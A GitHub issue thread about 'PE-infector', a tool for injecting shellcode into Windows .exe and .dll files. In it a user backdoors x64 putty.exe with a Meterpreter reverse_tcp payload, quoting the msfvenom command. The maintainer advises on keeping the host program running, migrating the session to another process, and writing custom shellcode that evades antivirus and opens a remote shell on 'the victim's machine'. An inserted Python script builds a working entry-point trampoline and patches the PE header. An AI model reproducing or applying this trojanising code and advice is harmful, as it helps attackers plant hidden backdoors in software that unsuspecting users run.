MastMind / PE-infector

Cross-platform tool for injecting shellcode into .exe and .dll binaries (x86 and x64)
52 stars, 19 forks

multithreading x64 #3

Closed ShonenNoSeishin closed 3 months ago

ShonenNoSeishin commented 4 months ago

Hi, thank you for your work! Can I ask you to explain the difficulty of implementing the multithreading feature for x64 PEs? Thanks in advance!

MastMind commented 4 months ago

Sure! For x86, multithreading is a special bytecode preamble which is inserted before the custom shellcode. The gist of this preamble is calling the CreateThread WinAPI function with the address of the custom shellcode. I tried to implement this trick for x64, but I couldn't automate it for arbitrary shellcode. x64 assembly has differences in calling convention and memory alignment. I guess it is not possible to make a "silver bullet" here. If you know how to write and debug shellcode you could add the CreateThread call manually. If it's interesting for you I could try to explain how to add this call.

ShonenNoSeishin commented 4 months ago

Thank you for your answer! I'm sorry, but I'm not good enough at this topic to help you add this kind of feature :/ . I would like to thank you for your project because it is well done and helped me understand the topic of binary patching! I'm currently working on an ethical patching project on x64 putty.exe and I want to add a shellcode to this PE. I created the shellcode with msfvenom (specifying the x64 architecture) and manually added a new section to the PE containing this shellcode. After that, I changed the entry point of the binary to point at this new section. Now, when I run the exe file, it runs the shellcode successfully! But even if I add a jump instruction to the original entry point at the end of my new section (the one that contains the shellcode), the exe program shuts down after running the shellcode. Do you have any advice for this lab? I'm not very good at this topic and I don't really understand the whole stack process, but I think I have to do something else in order to make putty work after the shellcode has been executed... (I found a lot of documentation for this lab, but only for 32 bits.) Note that when I create the payload, I use this command: msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp -f raw EXITFUNC=none -a x64 > backdoor64_NoExit.raw
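The two mechanical steps in the comment above (pointing AddressOfEntryPoint at the new code and jumping back to the original entry point afterwards) plus the x64 stack-alignment issue raised earlier in the thread are where hand patching usually goes wrong, so here is an added worked example. It is not code from the PE-infector project or from either participant. It assumes the caller has already created executable space for the payload at a known RVA (the `stub_rva` argument; how that space is made, a new section or a resized one, is outside the script) and that the shellcode returns with `ret` and leaves rsp where it found it. The PE header built by `build_minimal_pe64_header` is a constructed fixture, not a real putty.exe header.

```python
"""
Added example (not PE-infector's own code): build an x64 entry-point
trampoline that runs shellcode and then jumps back to the original entry
point (OEP), and patch AddressOfEntryPoint in a PE32+ header.

Assumptions: the payload will be placed at stub_rva in an executable region
by the caller, and the shellcode returns with rsp intact.
"""
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32PLUS_MAGIC = 0x20B


def nt_headers_offset(image: bytes) -> int:
    """Return the file offset of IMAGE_NT_HEADERS, validating MZ and PE signatures."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return e_lfanew


def entry_point_field_offset(image: bytes) -> int:
    """Offset of IMAGE_OPTIONAL_HEADER64.AddressOfEntryPoint; refuses non-x64 images."""
    nt = nt_headers_offset(image)
    machine = struct.unpack_from("<H", image, nt + 4)[0]
    if machine != IMAGE_FILE_MACHINE_AMD64:
        raise ValueError("the trampoline below is x64 only; image is not AMD64")
    opt = nt + 4 + 20                       # skip Signature + IMAGE_FILE_HEADER
    if struct.unpack_from("<H", image, opt)[0] != PE32PLUS_MAGIC:
        raise ValueError("not a PE32+ optional header")
    return opt + 16                         # AddressOfEntryPoint field


def get_entry_point(image: bytes) -> int:
    return struct.unpack_from("<I", image, entry_point_field_offset(image))[0]


def set_entry_point(image: bytes, rva: int) -> bytes:
    buf = bytearray(image)
    struct.pack_into("<I", buf, entry_point_field_offset(image), rva)
    return bytes(buf)


def rel32(next_insn_rva: int, target_rva: int) -> bytes:
    """rel32 operand for E8 call / E9 jmp: target minus the address of the NEXT instruction."""
    delta = target_rva - next_insn_rva
    if not -0x80000000 <= delta <= 0x7FFFFFFF:
        raise ValueError("target out of rel32 range")
    return struct.pack("<i", delta)


def build_x64_trampoline(stub_rva: int, oep_rva: int, shellcode: bytes) -> bytes:
    """
    31-byte stub followed immediately by the shellcode:
      push rbp; mov rbp,rsp; push rcx; push rdx     save frame and entry registers
      and rsp,-16; sub rsp,0x20                     16-byte alignment + shadow space
      call shellcode                                callee sees rsp == 8 (mod 16), as the ABI requires
      lea rsp,[rbp-16]; pop rdx; pop rcx; pop rbp   restore exactly what was pushed
      jmp OEP                                       original code sees the untouched entry stack
    """
    parts = [
        b"\x55",                    # push rbp
        b"\x48\x89\xE5",            # mov rbp, rsp
        b"\x51",                    # push rcx
        b"\x52",                    # push rdx
        b"\x48\x83\xE4\xF0",        # and rsp, -16
        b"\x48\x83\xEC\x20",        # sub rsp, 0x20
    ]
    call_at = sum(len(p) for p in parts)            # 14
    shellcode_off = call_at + 5 + 4 + 1 + 1 + 1 + 5  # 31: call + lea + 3 pops + jmp
    parts.append(b"\xE8" + rel32(stub_rva + call_at + 5, stub_rva + shellcode_off))
    parts += [
        b"\x48\x8D\x65\xF0",        # lea rsp, [rbp-16]
        b"\x5A",                    # pop rdx
        b"\x59",                    # pop rcx
        b"\x5D",                    # pop rbp
    ]
    jmp_at = sum(len(p) for p in parts)             # 26
    parts.append(b"\xE9" + rel32(stub_rva + jmp_at + 5, oep_rva))
    stub = b"".join(parts)
    assert len(stub) == shellcode_off
    return stub + shellcode


def infect(image: bytes, stub_rva: int, shellcode: bytes):
    """Redirect the entry point to stub_rva; return (patched image, payload to write at stub_rva)."""
    oep = get_entry_point(image)
    payload = build_x64_trampoline(stub_rva, oep, shellcode)
    return set_entry_point(image, stub_rva), payload


def build_minimal_pe64_header(entry_rva: int) -> bytes:
    """Constructed fixture: just enough of a PE32+ header for the helpers above."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 1, 0, 0, 0, 0xF0, 0x22)
    opt = struct.pack("<HBBIIII", PE32PLUS_MAGIC, 14, 0, 0x200, 0, 0, entry_rva)
    opt += b"\x00" * (0xF0 - len(opt))
    return dos + b"PE\x00\x00" + file_hdr + opt


if __name__ == "__main__":
    hdr = build_minimal_pe64_header(0x1000)                 # constructed: OEP = 0x1000
    patched, payload = infect(hdr, 0x5000, b"\x90\xC3")     # constructed shellcode: nop; ret
    print(f"entry point 0x{get_entry_point(hdr):x} -> 0x{get_entry_point(patched):x}")
    print(payload.hex())
```

The stub saves rcx and rdx because on Windows the entry point is called like a normal function and the original startup code may read those registers; it realigns rsp instead of assuming it, so it works whether the stub is reached from the loader or from another hook. The caveat that matters for the lab above: a staged msfvenom payload hands control to the downloaded stage and never executes `ret`, so no amount of jump-back fixes the process exiting; the shellcode must either return cleanly or run in its own thread.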

Here is what I want to do, but this tutorial is in 32 bits and I'm looking for 64 (this tutorial uses your project, but I'm currently trying to do it by hand to understand how it works): https://medium.com/@lowpold2/how-to-patch-exe-files-4767a5df33c4

Thanks in advance! (If you want to contact me on another social network, please let me know.)

MastMind commented 4 months ago

You used msfvenom shellcode. Very well! I recommend using my project for msfvenom shellcode. But actually msfvenom sometimes produces not-so-good shellcode (the issue is the bad exitfunc at the end; it seems that EXITFUNC doesn't matter for meterpreter/reverse_tcp). In your situation I can recommend the following options:

  1. On your listener machine (where msfconsole is running with multi/handler and PAYLOAD set to meterpreter/reverse_tcp), change the value of EXITFUNC before starting the listener (just run the command set EXITFUNC none). This could make sense because the shellcode generated by msfvenom is not the real meterpreter/reverse_tcp. It is a stager for downloading the real reverse_tcp from the listener machine. If you succeed and your original program does not close, just try to migrate to another process (for example explorer.exe) in the created meterpreter session. It should resume running of the original code.
  2. Try other shellcodes from msf, like x64/meterpreter/reverse_http or x64/meterpreter/reverse_https (you can get the whole list of available payloads in msfconsole by executing the command search windows/x64/meterpreter). Every payload can be used with msfvenom.
  3. If possible, please do not create a new section. The modern Windows PE loaders since Windows 10 refuse such PEs (because de facto only one executable section can exist). Use my utility with the -m resz option instead; it will try to resize the current executable section and deploy the shellcode in this new space.

P.S. If you are interested in real usage of shellcode, I can help with writing shellcode manually (creating a remote PowerShell console on the victim's machine is an easy task). I'm now working on a new article for medium.com about this topic. Writing it manually is the better option because every antivirus can detect msf shellcode, and you have more flexibility to add features like running within another thread, minimizing the final result, etc.

P.P.S. Yes, I would like to stay in contact with you. I don't have any social media, but you can write to me by email at lowpold1@gmail.com

ShonenNoSeishin commented 4 months ago

Thank you so much! I will get back to you tomorrow by email so as not to spam this issue!

MastMind commented 3 months ago

Thank you for this issue. I reviewed my old materials about shellcoding and found a way to implement x64 thread mode. I have committed this feature.